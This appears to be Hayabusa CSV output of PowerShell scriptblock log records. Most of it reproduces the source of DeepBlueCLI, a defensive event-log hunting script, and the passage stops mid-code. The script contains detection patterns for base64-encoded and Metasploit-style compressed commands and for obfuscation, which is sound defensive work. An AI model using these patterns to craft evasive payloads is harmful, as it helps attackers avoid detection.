+2017-08-31 01:32:13.804 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:32:14.325 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:33:28.096 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:33:34.598 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:33:34.600 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:33:34.601 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:33:35.043 +09:00,SEC511,4104,info,,PwSh Scriptblock 
Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:38:42.201 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[3].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:38:42.204 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:38:45.375 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[4].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:38:45.376 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:38:48.413 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[5].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:38:48.416 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:38:51.394 +09:00,SEC511,4104,info,,PwSh Scriptblock 
Log,"$eventxml.Event.EventData.Data[6].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:38:51.396 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:17.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:20.563 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:20.569 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:20.569 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the 
events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength 
$regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. 
# Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" 
